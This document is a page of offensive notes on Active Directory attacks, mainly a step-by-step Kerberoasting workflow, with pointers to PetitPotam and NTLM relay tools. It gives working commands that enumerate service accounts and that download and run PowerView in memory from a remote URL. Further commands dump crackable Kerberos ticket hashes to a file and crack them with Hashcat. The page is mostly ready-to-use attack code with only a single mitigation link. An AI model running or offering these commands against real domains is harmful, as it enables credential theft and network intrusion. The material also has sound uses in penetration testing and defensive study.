Active Directory Offensive Tradecraft

TTPs for Active Directory attacks

Some notes

Kerberoasting

Kerberoasting is a type of attack that exploits the Kerberos authentication protocol used by Active Directory to request and extract Kerberos tickets for service accounts. These tickets can then be cracked offline to obtain the plaintext passwords for the service accounts. Kerberoasting is often used to target high-privilege service accounts that are not subject to password rotation policies.

Workflow

01 Get SPNs

Using AD Powershell Module

# Get accounts with SPN
(Get-ADUser -Filter {servicePrincipalName -like '*'} -Properties servicePrincipalName).servicePrincipalName

Using setspn.exe

This is a default command that comes with windows.

setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1

Using AD Searcher

$ADBaseDir = (New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList "LDAP://rootDSE").Get("defaultNamingContext")
# We use .NET here to connect to the Domain via LDAP
$LDAPFilter = "(&(!objectClass=computer)(servicePrincipalName=*))"
$DomainFQDN = "LDAP://$ADBaseDir"
$ADPropertiesToLoad = @("name", "samaccountname", "displayname", "serviceprincipalname", "serviceprincipalnames")
$Domain = New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList
$DomainFQDN$ADSearcher = New-Object System.DirectoryServices.DirectorySearcher
$ADSearcher.SearchRoot = $Domain
$ADSearcher.PageSize = 10
$ADSearcher.Filter = $LDAPFilter
$ADSearcher.SearchScope = "Subtree"
ForEach ($prop in $ADPropertiesToLoad) {$ADSearcher.PropertiesToLoad.Add($prop)}
$Results = $ADSearcher.FindAll()

Using PowerView

# Launch shell as admin
# Load PowerSploit (host it in your own server of course...)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
Get-DomainUser -SPN

02. Request & Extract Roastable Kerberos Tickets

Using PowerView

# Launch shell as admin
# Load PowerSploit (host it in your own server of course...)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
Invoke-Kerberoast -OutputFormat Hashcat | % {$_.Hash} | Out-File 'C:\somewhere\spn_accounts_hashes.txt'

03. Crack Hashes with Hashcat

  • A HashCat cheat sheet –> https://github.com/frizb/Hashcat-Cheatsheet
.\hashcat.exe -m 19700 -a 0 -w 2 --force --opencl-device-types 1,2 -O 'C:\spn_accounts_hashes.txt' D:\wordlists\rockyou.txt -r .\rules\OneRuleToRuleThemAll.rule

References

NTLM Relay

Using PetitPotam

The tool can be obtained here: https://github.com/topotam/PetitPotam/blob/main/Petitpotam.py (note, requires Impacket to be installed)

References

  • Good practical guide: https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/ that shows how to run ntlmrelayx.py and set your Certificate Authority (CA) as a target.
  • Guide using PayloadAllThethings: https://gitlab.com/pentest-tools/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#ad-cs-relay-attack
  • Performing a similar attack with RemotePotato: https://github.com/antonioCoco/RemotePotato0
  • Takeover via RBCD (Resource Based Constrained Delegation): https://gist.github.com/audibleblink/06916db2a76c7bd13400c4f9da422ad5
  • Mitigations:
    • https://threatpost.com/microsoft-petitpotam-poc/168163/